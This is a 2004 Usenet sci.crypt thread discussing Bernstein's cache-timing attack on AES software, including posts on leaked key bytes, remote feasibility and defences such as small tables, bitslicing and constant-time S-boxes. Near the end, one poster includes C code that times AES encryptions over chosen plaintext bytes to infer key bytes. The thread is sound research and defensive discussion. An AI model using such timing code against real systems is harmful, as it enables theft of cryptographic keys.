Since most fast AES software works in a similar way, it is unlikely that
the effect is present in some implementations and not in others.

But the effect is very dependent on setting up the AES tables in a way
that invokes specific cache behaviour.

If timing attacks are a concern, much smaller tables can be used. I
don't see the effect on any processors when AES is implemented with
small tables (this reduces the speed by a factor of about 2).

Brian Gladman

Francois Grieu

unread,
Nov 12, 2004, 8:13:56 AM11/12/04
to
As of the design of constant timing, fast, robust cryptographic
constructs, DJB's paper [?] offers a prize for a break of his
salsa10 construct. It is built from alternation of 32-bit
addition, xor, and constant rotations. See the paper for details.

salsa10 looks like an improved version of slash [**], with
better parallelizability of operations, and less operations (5/8);
also notable are a "butterfly" diffusion schedule, and more
irregular structure (randomized rotation constants, randomized
choice between add-then-xor or xor-then-add, and an additive
value that changes across rounds).

I guess DJB has some theory, or at least justifiable rule of
thumb, to decide the number of operations. Designers of SHA-x faced
the same issue. But neither had the gu^K^K^K imprudence to state it.

Any pointer to solid theory on the security level of this sort
of construct. e.g., most importantly, the effect of the number
of operations on differential/linear/impossible/unamit cryptanalysis?
And/or on the need for some amount of irregularity in the structure?


TIA,

Francois Grieu


[*] Daniel J. Bernstein: Cache-timing attacks on AES
<http://cr.yp.to/antiforgery.html#cachetiming>
<http://cr.yp.to/antiforgery/cachetiming-20041111.pdf>

[**] post on sci.crypt.research circa 2004-09-07
article <2q4o33F...@uni-berlin.de>
<http://google.com/groups?as_umsgid=2q4o33F...@uni-berlin.de>

Francois Grieu

unread,
Nov 12, 2004, 8:51:38 AM11/12/04
to
As of the design of constant timing, fast, robust cryptographic
constructs, DJB's paper [1] offers a prize for a break of his

salsa10 construct. It is built from alternation of 32-bit
addition, xor, and constant rotations. See the paper for details.

salsa10 looks like an improved version of slash [2], with


better parallelizability of operations, and less operations (5/8);
also notable are a "butterfly" diffusion schedule, and more
irregular structure (randomized rotation constants, randomized
choice between add-then-xor or xor-then-add, and an additive
value that changes across rounds).

I guess DJB has some theory, or at least justifiable rule of
thumb, to decide the number of operations. Designers of SHA-x faced
the same issue. But neither had the gu^K^K^K imprudence to state it.

Any pointer to solid theory on the security level of this sort
of construct. e.g., most importantly, the effect of the number
of operations on differential/linear/impossible/unamit cryptanalysis?
And/or on the need for some amount of irregularity in the structure?


TIA,

Francois Grieu


[1] Daniel J. Bernstein: Cache-timing attacks on AES
<http://cr.yp.to/antiforgery.html#cachetiming>
<http://cr.yp.to/antiforgery/cachetiming-20041111.pdf>

[2] post on sci.crypt.research circa 2004-09-07
article <2q4o33F...@uni-berlin.de>
<http://google.com/groups?as_umsgid=2q4o33F...@uni-berlin.de>

D. J. Bernstein

unread,
Nov 12, 2004, 4:03:25 PM11/12/04
to
Phil Carmody wrote:
> the third byte isn't 100% reliable, having 2 non-135 values.

True. But the 135 becomes solid when the number of loops increases.

> I notice that the lowest bit of byte 0 is 0 for all but 2
> of the values in your table. Is that statistically significant,

Could be random. I didn't look for (and am not planning to look for)
further patterns; 24 leaked key bits is already unacceptable.

If you want to try extracting the entire key, you could look for more
patterns in the timings, or you could arrange for different sets of
variables to be touched before the AES call.

Markus Jansson

unread,
Nov 12, 2004, 5:26:07 PM11/12/04
to
D. J. Bernstein wrote:
> More than that: I'm saying that _typical_ software implementations of
> AES _do_ leak key bits to the simplest conceivable timing attack.

So? If you can get your hands to the physical computer and software that
is running it, you can get the key anyway (read it from the memory
etc.). Ofcourse you have to do the actual encryptions in secure
enviroment, because if you cant control the computer that runs them, you
are screwed anyway.

--
My computer security & privacy related homepage
http://www.markusjansson.net
Use HushTools or GnuPG/PGP to encrypt any email
before sending it to me to protect our privacy.

D. J. Bernstein

unread,
Nov 12, 2004, 7:00:48 PM11/12/04
to
Markus Jansson wrote:
> If you can get your hands to the physical computer and software that
> is running it, you can get the key anyway (read it from the memory etc.)

The attack doesn't read the key from memory. What it reads is the time
taken to compute AES_k(n) for selected values of n. It easily figures
out some key bytes from those timings.

Randy Howard

unread,
Nov 13, 2004, 11:20:32 AM11/13/04
to
In article <slrncp7p1b....@stoneport.math.uic.edu>, d...@cr.yp.to
says...

> BRG wrote:
> > If I am reading this correctly, his claim is not that AES is insecure
> > but rather that particular _implementations_ of AES might be insecure
> > because they might leak key bits when subject to timing attacks.
>
> More than that: I'm saying that _typical_ software implementations of
> AES _do_ leak key bits to the simplest conceivable timing attack. The
> underlying problem is that it's hard to do an S-box lookup in constant
> time on modern CPUs.

Is there any impact on this approach working on systems with more than
one processor (SMP or dual core) or with "virtual CPUs" (hyperthreading)
as opposed to a conventional UP system? How about the effects of other
application loads on a multitasking system impacting the results?

--
Randy Howard (2reply remove FOOBAR)

Erwann ABALEA

unread,
Nov 13, 2004, 12:03:39 PM11/13/04
to

I ran the time.c program along with the 6 AES implementations present in
aesbench.tgz (devine, gladman, mks, openssl, gpg, tom), on several
machines, one of them is a dual Celeron 560. Patterns also appear on this
machine.

The "worst" case was the "devine" implementation on a Pentium III. 50% of
the key bytes showed a repetitive pattern.

--
Erwann ABALEA <erw...@abalea.com> - RSA PGP Key ID: 0x2D0EABD5
-----
ED> >:)
T'utilise des rires enregistrés (c)... T'es *vraiment* un dinosaure?
J'ai un doute...
-+-RG: Guide du Neueu Usenet-La prudence est le début de la sagesse-+-

David Wagner

unread,
Nov 13, 2004, 12:04:25 PM11/13/04
to
Quoting from the paper:
"Of course, the same attacks can be carried out on AES
implementations exposed to the network."

Does anyone have any estimates for how many queries might be required?
It all comes down to the S/N ratio; does anyone have any information on
how large a bias the timing variability causes?

Does anyone know of an example of an AES implementation that can be
compromised in this way by a remote attacker on the other side of a
wide-area network link?

David Wagner

unread,
Nov 13, 2004, 12:07:11 PM11/13/04
to
One defense against cache timing attacks is to use bitslice
implementations. (Serpent, anyone?) In its simplest form, you can
reduce the function to be computed to a logical circuit, then evaluate
that circuit using AND, OR, NOT. This should be safe so long as the
time to compute AND, OR, and NOT instructions is not data-dependent in
any way, which seems like a plausible assumption.

Does anyone know whether one can implement AES efficiently using a
bitslice (or similar) strategy?

David Wagner

unread,
Nov 13, 2004, 12:18:45 PM11/13/04
to
It seems that the design of constant-time algorithms depends on
the implementation platform. On some 8-bit embedded processors,
data-dependent shifts and rotates are not constant-time, while AES
S-box computations may well be constant-time (whether due to the lack
of cache, or to other strategies for evaluating the AES S-box without
table lookups).

By the way, one way to compute the AES S-box in constant time is by
raising the input to the 254th power in GF(2^8), using constant-time
subroutines for squaring and multiplication. I think I first saw this
idea in a paper by Bloemer et al in SAC 2004.

BRG

unread,
Nov 13, 2004, 1:41:58 PM11/13/04
to
David Wagner wrote:
> One defense against cache timing attacks is to use bitslice
> implementations. (Serpent, anyone?) In its simplest form, you can
> reduce the function to be computed to a logical circuit, then evaluate
> that circuit using AND, OR, NOT. This should be safe so long as the
> time to compute AND, OR, and NOT instructions is not data-dependent in
> any way, which seems like a plausible assumption.

AES can be implemented without tables but it is very slow comapred to
the normal methods. But it can also be implemented with quite small
tables at about half normal speed and I have not seen any timing
anomalies in this implementation.

Brian Gladman

David Wagner

unread,
Nov 13, 2004, 1:47:26 PM11/13/04
to
BRG wrote:
>But it can also be implemented with quite small
>tables at about half normal speed and I have not seen any timing
>anomalies in this implementation.

By "quite small", do you mean an 8-bit to 8-bit table
(e.g., for inversion in GF(2^8))? Or do you perhaps mean
the trick by which inversion in GF(2^8) can be expressed as
a few operations in GF(2^4), which I presume could be expressed
with 4-bit tables?

John Savard

unread,
Nov 13, 2004, 1:48:01 PM11/13/04
to
On Sat, 13 Nov 2004 17:18:45 +0000 (UTC), d...@taverner.cs.berkeley.edu
(David Wagner) wrote, in part:

>It seems that the design of constant-time algorithms depends on
>the implementation platform. On some 8-bit embedded processors,
>data-dependent shifts and rotates are not constant-time, while AES
>S-box computations may well be constant-time (whether due to the lack
>of cache, or to other strategies for evaluating the AES S-box without
>table lookups).

This is very true.

John Savard
http://home.ecn.ab.ca/~jsavard/index.html

Tom St Denis

unread,
Nov 13, 2004, 3:29:42 PM11/13/04
to

Good question. Someone should setup a challenge server that acts as a
random oracle to test this problem.

Tom

BRG

unread,
Nov 13, 2004, 4:25:32 PM11/13/04
to

I did think about these options but the one I was specifically thinking
of is different as all of these options are very slow in software.

The normal AES implementations use large tables of 4096 bytes each and
can have up to 4 such tables with a total table byte count of up to
16384 bytes (half this for encryption only). This puts a lot of
pressure on the cache in some machines and it is this that the timing
attack is able to exploit.

But AES can be implemented at about half maximum speed with two tables
each of 1024 bytes (or only 1024 bytes for encryption alone). While
this won't completely eliminate timing issues it is not pressing the
cache anywhere near as hard and will therefore be far less likely to be
easily exploitatble.

It was this option that I had in mind. I have run DJB's timing attack on
this code in a P3 - where the attack works for large tables - and was
unable to see any timing effects with his code.

Brian Gladman

D. J. Bernstein

unread,
Nov 13, 2004, 8:41:26 PM11/13/04
to
Erwann ABALEA wrote:
> I ran the time.c program along with the 6 AES implementations present
> in aesbench.tgz (devine, gladman, mks, openssl, gpg, tom), on several
> machines, one of them is a dual Celeron 560. Patterns also appear on
> this machine.

Thanks for the report.

> The "worst" case was the "devine" implementation on a Pentium III. 50%
> of the key bytes showed a repetitive pattern.

You shouldn't compare implementations based on how badly they flunk this
very simple test. Even if you don't take the serious cryptographer's
attitude that leaking a single key byte is a disaster, you should assume
that slightly more sophisticated attacks will obtain all the key bits.

D. J. Bernstein

unread,
Nov 13, 2004, 8:52:58 PM11/13/04
to
David Wagner wrote:
> It seems that the design of constant-time algorithms depends on
> the implementation platform. On some 8-bit embedded processors,
> data-dependent shifts and rotates are not constant-time, while AES
> S-box computations may well be constant-time

This is certainly an issue for RC6, although it doesn't bother me as
much as the lack of key agility in RC6.

> By the way, one way to compute the AES S-box in constant time is by
> raising the input to the 254th power in GF(2^8), using constant-time
> subroutines for squaring and multiplication. I think I first saw this
> idea in a paper by Bloemer et al in SAC 2004.

http://cr.yp.to/talks.html#2001.10.29, page 20, specifically identifies
input-independent timings as an advantage of this reciprocal strategy.
(I'm citing the Bloemer paper for other reasons.)

David Wagner

unread,
Nov 14, 2004, 12:57:10 AM11/14/04
to
D. J. Bernstein wrote:

>David Wagner wrote:
>> By the way, one way to compute the AES S-box in constant time is by
>> raising the input to the 254th power in GF(2^8), using constant-time
>> subroutines for squaring and multiplication. I think I first saw this
>> idea in a paper by Bloemer et al in SAC 2004.
>
>http://cr.yp.to/talks.html#2001.10.29, page 20, specifically identifies
>input-independent timings as an advantage of this reciprocal strategy.
>(I'm citing the Bloemer paper for other reasons.)

Thanks for pointing that out. I hadn't seen that before. I appreciate
the reference. I'll update my notes.

Douglas A. Gwyn

unread,
Nov 14, 2004, 2:19:28 AM11/14/04
to
David Wagner wrote:
> Does anyone know whether one can implement AES efficiently using a
> bitslice (or similar) strategy?

Sure, AES as well as most other block ciphers can be
implemented in various ways "in silicon", and most
of the obvious ones won't have caches. That's not
to say that key- or data-dependent timing variations
aren't still possible, but at least it's not as hard
for the implementor to take steps to avoid them.

ved...@hush.com

unread,
Nov 14, 2004, 9:16:59 AM11/14/04
to
"D. J. Bernstein" <d...@cr.yp.to> wrote in message news:<slrncpa77l....@stoneport.math.uic.edu>...

> Could be random. I didn't look for (and am not planning to look for)
> further patterns; 24 leaked key bits is already unacceptable.
>
> If you want to try extracting the entire key, you could look for more
> patterns in the timings, or you could arrange for different sets of
> variables to be touched before the AES call.

this being so,
it is curious why rijndael is still the 'aes',
and that the government hasn't advised a move to another symmetric algorithm,
pending further investigation.

can the cache timing atack be exploited to attack an already encrypted file,
or extract the key,
if one does not have access to the machine while it is encrypting?


vedaal

David Wagner

unread,
Nov 14, 2004, 4:10:52 PM11/14/04
to
ved...@hush.com wrote:
>this being so,
>it is curious why rijndael is still the 'aes',

Pick your favorite among the following possible reasons:
1) because this wasn't part of the threat model / evaluation criteria
for the AES.
2) because in many environments, this attack will either not pose a threat
or can be defended against adequately.
3) because most block ciphers out there suffer from the same issue.

David Wagner

unread,
Nov 14, 2004, 4:11:30 PM11/14/04
to
Douglas A. Gwyn wrote:
>David Wagner wrote:
>> Does anyone know whether one can implement AES efficiently using a
>> bitslice (or similar) strategy?
>
>Sure, AES as well as most other block ciphers can be
>implemented in various ways "in silicon", [...]

Sorry; I think I asked the wrong question. I meant, can one implement
AES efficiently in software using bitslice (or similar) strategies?

Douglas A. Gwyn

unread,
Nov 15, 2004, 1:22:22 AM11/15/04
to
David Wagner wrote:
> Sorry; I think I asked the wrong question. I meant, can one implement
> AES efficiently in software using bitslice (or similar) strategies?

I guess what you are suggesting is a special-purpose
periphral "crypto machine" that has a simple architecture.
In fact these exist; Motorola's AIM was the first I know
of offered to the general public. It could be programmed
to support several independent channels, each with its own
algorithm.

David Wagner

unread,
Nov 15, 2004, 2:45:51 AM11/15/04
to
Douglas A. Gwyn wrote:
>David Wagner wrote:
>> Sorry; I think I asked the wrong question. I meant, can one implement
>> AES efficiently in software using bitslice (or similar) strategies?
>
>I guess what you are suggesting is a special-purpose
>periphral "crypto machine" that has a simple architecture.

Nope. I'm referring to a particular implementation strategy,
in software only (using only whatever standard CPU you already have
access to), for implementing block ciphers. This implementation strategy
is distinguished by its use of logical bitwise operations (OR, AND, XOR,
NOT, etc.) on the microprocessor to perform 32 logical operations in
parallel (on a 32-bit microprocessor). Serpent is a famous example
of a cipher amenable to this implementation strategy. I was curious
whether there are any efficient ways to implement AES using this
kind of approach.

Colin Andrew Percival

unread,
Nov 15, 2004, 5:00:09 AM11/15/04
to
David Wagner <d...@taverner.cs.berkeley.edu> wrote:
> Sorry; I think I asked the wrong question. I meant, can one implement
> AES efficiently in software using bitslice (or similar) strategies?

Back before Rijndael became AES, I looked at doing this using the MMX
operations on the Pentium II (or was it the Pentium MMX? I'm not sure,
but it was something from that era) -- the idea being that you could
perform several modular inversions in parallel.

In terms of the simple operation count, it worked out to being about 1/3
of the speed of the lookup table approach, so I didn't pursue it any
further. If this is still a concern, I'll see if I can find my notes...
after I submit my thesis, get my viva scheduled, graduate, and escape
from Oxford. All my notes are in Vancouver.

Colin Percival

Michael Amling

unread,
Nov 15, 2004, 11:17:14 AM11/15/04
to

I think Dr. Wagner is referring to Biham's "bitslice" method of doing
32 or 64 DES encryptions in parallel using scalar registers, and asking
if it can be applied to AES. The bitslice technique can be implemented
in hardware or software. See "A Fast New DES Implementation in Software"
at http://www.cs.technion.ac.il/~biham/publications.html.
I'm sure AES can be implemented using the bitslice technique. The
question is whether that would be faster than a traditional
implementation, at least in those cases that can benefit from doing
several blocks in parallel.

--Mike Amling

David Wagner

unread,
Nov 15, 2004, 1:47:40 PM11/15/04
to
Michael Amling wrote:
> I think Dr. Wagner is referring to Biham's "bitslice" method of doing
>32 or 64 DES encryptions in parallel using scalar registers, and asking
>if it can be applied to AES. The bitslice technique can be implemented
>in hardware or software. See "A Fast New DES Implementation in Software"
>at http://www.cs.technion.ac.il/~biham/publications.html.

Right. Thanks for digging up the pointer.

> I'm sure AES can be implemented using the bitslice technique. The
>question is whether that would be faster than a traditional
>implementation, at least in those cases that can benefit from doing
>several blocks in parallel.

I'd settle if bitslice implementations just were "not too much slower"
than ordinary implementations of AES. The motivation was whether they
could serve as a defense against cache timing attacks without incurring
too much overhead.

karl malbrain

unread,
Nov 16, 2004, 1:24:41 PM11/16/04
to
d...@taverner.cs.berkeley.edu (David Wagner) wrote in message news:<cnatkc$1cgi$2...@agate.berkeley.edu>...
> Michael Amling wrote:

> > I'm sure AES can be implemented using the bitslice technique. The
> >question is whether that would be faster than a traditional
> >implementation, at least in those cases that can benefit from doing
> >several blocks in parallel.
>
> I'd settle if bitslice implementations just were "not too much slower"
> than ordinary implementations of AES. The motivation was whether they
> could serve as a defense against cache timing attacks without incurring
> too much overhead.

I've posted on my web site a variant of my AES implementation that
stores the S-box tables in banks of bits -- all 256 bit number zero
values are stored in the first 32 bytes, then the 256 bit number one
values, and so on. With the Intel cache line length of 32 bytes I
believe this version should resist the S-box timing attack.

www.geocities.com/malbrain

karl m

Stefan Tillich

unread,
Nov 17, 2004, 12:49:49 PM11/17/04
to
Hi,

D. J. Bernstein schrieb:
> http://cr.yp.to/papers.html#cachetiming


>
> ---D. J. Bernstein, Associate Professor, Department of Mathematics,
> Statistics, and Computer Science, University of Illinois at Chicago

How exactly would an attacker exploit the timing information to
determine some key bytes in an actual attack?

You can determine the slowest index into the lookup (which is what you
do with the program in your paper), but for that you need knowledge of
the key.

You can also determine a plaintext byte which results in slowest lookup
(provided that you can choose the plaintext for the attacked device),
but that won't help you if you don't know the actual lookup index.

Any ideas?

Best regards
Stefan


Tom St Denis

unread,
Nov 17, 2004, 2:37:24 PM11/17/04
to

The attack actually does work. Why it works I'm not 100% sure. The
function he designed does emit a value which when xor'ed with the key
byte produces the same value over multiple runs. For instance you saw
us saying something like

byte 1, loops 256: 245 245 245 245 ...

That means for the 1st key byte the function returned "key ^ 245".
Since it's reliable you can then infer that key is actually the return
value xor'ed with 245.

The attack is highly subjective to how the function was implemented
*and* compiled. That and it's effectively impossible to exploit in
virtually any system cuz well it's a chosen plaintext attack and has to
be run as close to the system as possible.

So for example, you'd have to be logged into Amazon, somehow getting an
SSL session to encrypt thousands of texts for you while not violating
the session [on either end] to get 24 out of 128 bits. Totally likely
scenario.

In cases where a local login and chosen plaintext venue is possible the
solution would be as simple as using the 1 table method [because the
other tables are just rotated versions]. 1KB of ram would easily fit in
practically any modern L1 cache and it would get many hits that would
significantly reduce the attack. Further than that you can compute the
sbox on the fly.

DJ should get credit for developing the attack cuz it's cool. Aside
from that though I wouldn't worry about it in the field. Well... be
"aware" of the attack and use it during your design but i don't think we
have to stop the world from spinning to replace AES just yet.

Tom

karl malbrain

unread,
Nov 17, 2004, 6:21:04 PM11/17/04
to
"D. J. Bernstein" <d...@cr.yp.to> wrote in message news:<slrncp8kf2...@stoneport.math.uic.edu>...
> Tom St Denis wrote:
> > Also if his intention was to suggest that implementations ought to
> > tighten up
>
> The paper spends a couple of pages explaining how expensive it is to
> avoid the four most obvious sources of variability in S-box timing. If
> you ever manage to write an AES implementation that doesn't have
> input-dependent timings, feel free to tell us exactly how slow it is.

I've posted on my site a version that shouldn't have input-dependent
timings and is only 10-20% slower than the naive table-driven
implementation.

www.geocities.com/malbrain/newaes3_c

karl m

BRG

unread,
Nov 18, 2004, 2:41:34 AM11/18/04
to

This will be very slow whwn compared with normal table driven
implementations of AES on modern Intel x86 family processors.

For large messages used with pre-computed key schedules, pretty well all
decent table driven versions of AES can achieve less than 30 cycles per
byte on modern x86 processors - what will your version achieve in such
situations?

In what circumstances do you think it will be only 10-20% slower?

Brian Gladman

Stefan Tillich

unread,
Nov 18, 2004, 2:45:00 AM11/18/04
to

Tom St Denis schrieb:


> Stefan Tillich wrote:
>
>> Hi,
>>
>> D. J. Bernstein schrieb:
>>
>>> http://cr.yp.to/papers.html#cachetiming
>>>
>>> ---D. J. Bernstein, Associate Professor, Department of Mathematics,
>>> Statistics, and Computer Science, University of Illinois at Chicago
>>
>>
>>
>> How exactly would an attacker exploit the timing information to
>> determine some key bytes in an actual attack?
>>
>> You can determine the slowest index into the lookup (which is what you
>> do with the program in your paper), but for that you need knowledge of
>> the key.
>>
>> You can also determine a plaintext byte which results in slowest
>> lookup (provided that you can choose the plaintext for the attacked
>> device), but that won't help you if you don't know the actual lookup
>> index.
>>
>> Any ideas?
>
>
> The attack actually does work. Why it works I'm not 100% sure. The
> function he designed does emit a value which when xor'ed with the key
> byte produces the same value over multiple runs. For instance you saw
> us saying something like
>
> byte 1, loops 256: 245 245 245 245 ...
>
> That means for the 1st key byte the function returned "key ^ 245". Since
> it's reliable you can then infer that key is actually the return value
> xor'ed with 245.

As far as I can see it, the output is (plaintext_byte ^ key_byte), which
would be the index into one of the T tables (in 4 T-table
implementation). So IMHO you need to determine which such indexes result
in slower AES operation. To do this seems very unlikely in a real-world
setting.

The code in the paper demonstrates that there can be a dependency of AES
execution time on some index into T. What the paper is lacking (or which
should be done in a sequel paper) should be a demonstration that key
bytes can be recovered at least in a controlled laboratory setting. If
this cannot even be done in an environment, where almost all parameters
are under the attackers control, then a real-world attack is infeasible.

>
> The attack is highly subjective to how the function was implemented
> *and* compiled. That and it's effectively impossible to exploit in
> virtually any system cuz well it's a chosen plaintext attack and has to
> be run as close to the system as possible.

I agree. In my opinion, if an attack can be made then only if at least
the following information is known:
- Complete sourcecode of program which computes AES, compiler, compiler
version OR the object code
- Processor, cache organization, cache size, cache replacement strategy
- Operating system, version

>
> So for example, you'd have to be logged into Amazon, somehow getting an
> SSL session to encrypt thousands of texts for you while not violating
> the session [on either end] to get 24 out of 128 bits. Totally likely
> scenario.

As DJ said himself: To get 1 clock cycle out of timing noise due to
network latency is infeasible.

>
> In cases where a local login and chosen plaintext venue is possible the
> solution would be as simple as using the 1 table method [because the
> other tables are just rotated versions]. 1KB of ram would easily fit in
> practically any modern L1 cache and it would get many hits that would
> significantly reduce the attack. Further than that you can compute the
> sbox on the fly.
>
> DJ should get credit for developing the attack cuz it's cool. Aside
> from that though I wouldn't worry about it in the field. Well... be
> "aware" of the attack and use it during your design but i don't think we
> have to stop the world from spinning to replace AES just yet.

The least I expect from a paper on an attack is to demonstrate how it
can be done at least in the laboratory.

Best regards
Stefan Tillich

karl malbrain

unread,
Nov 18, 2004, 12:16:43 PM11/18/04
to
BRG <b...@nowhere.org> wrote in message news:<419c5229$0$4021$ed26...@ptn-nntp-reader01.plus.net>...

> karl malbrain wrote:
> > "D. J. Bernstein" <d...@cr.yp.to> wrote in message news:<slrncp8kf2...@stoneport.math.uic.edu>...
> >
> >>Tom St Denis wrote:
> >>
> >>>Also if his intention was to suggest that implementations ought to
> >>>tighten up
> >>
> >>The paper spends a couple of pages explaining how expensive it is to
> >>avoid the four most obvious sources of variability in S-box timing. If
> >>you ever manage to write an AES implementation that doesn't have
> >>input-dependent timings, feel free to tell us exactly how slow it is.
> >
> > I've posted on my site a version that shouldn't have input-dependent
> > timings and is only 10-20% slower than the naive table-driven
> > implementation.
> >
> > www.geocities.com/malbrain/newaes3_c
>
> This will be very slow whwn compared with normal table driven
> implementations of AES on modern Intel x86 family processors.

Only the S-Box and InvMixColumn functions are slower -- about 8 times
and 4 times respectively over their naive table lookup counterparts.



> For large messages used with pre-computed key schedules, pretty well all
> decent table driven versions of AES can achieve less than 30 cycles per
> byte on modern x86 processors - what will your version achieve in such
> situations?

The issue is a version of AES that can be implemented that withstands
timing attacks. I don't claim that my posted version is optimized,
only that it displays constant time when compiled with a compiler that
issues instructions for ?: expressions without jumps. Microsoft VC
version 12.00.8804 is one such compiler. I've examined the assembly
code and there are no data-dependent jumps.

> In what circumstances do you think it will be only 10-20% slower?

I compared to my previous naive table lookup program, also posted on
my site at www.geocities.com/malbrain/aes_c.html to get the 10-20%
figure. It's just a rough number derived from 74 MB in 1 Minute v.
1.20 minutes. Perhaps you'd be willing to insert the necessary CPU
instructions to obtain the cycles per byte figure you desire.

karl m

karl malbrain

unread,
Nov 18, 2004, 4:13:25 PM11/18/04
to
"D. J. Bernstein" <d...@cr.yp.to> wrote in message news:<slrncp7adr....@stoneport.math.uic.edu>...

> http://cr.yp.to/papers.html#cachetiming
>
> ---D. J. Bernstein, Associate Professor, Department of Mathematics,
> Statistics, and Computer Science, University of Illinois at Chicago

I've tried unsuccessfully to reproduce your results. I entered the
following functions from your paper. Perhaps you could illustrate my
error.

unsigned char in[4 * Nb], out[4 * Nb], key[4 * Nb];
unsigned expkey[Nb * (Nr + 1)];

__int64 rd_clock (void)
{
unsigned dwLow, dwHigh;

__asm {
rdtsc
mov dwLow, eax
mov dwHigh, edx
}
return ((__int64)dwHigh)<<32 | dwLow;
}

int aescycles ()
{
__int64 start, end;
int t;

do {
start = rd_clock();
Encrypt (in, expkey, out);
end = rd_clock ();
t = end - start;
} while( t<= 0 || t>= 1000);
return t;
}

int bestx (int b, int loops)
{
int bestx = 0, bestxt = 0;
int x, xt, i, j;

for( x = 0; x < 256; x++ ) {
xt = 0;
for( i = 0; i < loops; i++ ) {
for( j = 0; j < 16; j++ )
in[j] = xrandom() >> 16;
in[b] = x;
xt += aescycles(); xt += aescycles(), xt += aescycles();
xt += aescycles(); xt += aescycles();
}
if( xt > bestxt )
bestx = x, bestxt = xt;
}
return bestx;
}

void bernstein (char *seed)
{
int loops, b, j, k;

mrandom (strlen(seed), seed);

for( loops = 4; loops <= 65536; loops *= 2) {
for( b = 0; b < 16; b++ ) {
printf ("%.2d, %.5d loops:", b, loops);
for( k = 0; k < 10; k++ ) {
for( j = 0; j < 16; j++ )
key[j] = xrandom() >> 16;
ExpandKey (key, expkey);
printf (" %.2x", bestx (b, loops) ^ key[b]);
fflush (stdout);
}
printf ("\n");
}
}
}


The mrandom and xrandom functions are from the standard berkeley
library.

Thanks, karl m

David Wagner

unread,
Nov 18, 2004, 5:59:58 PM11/18/04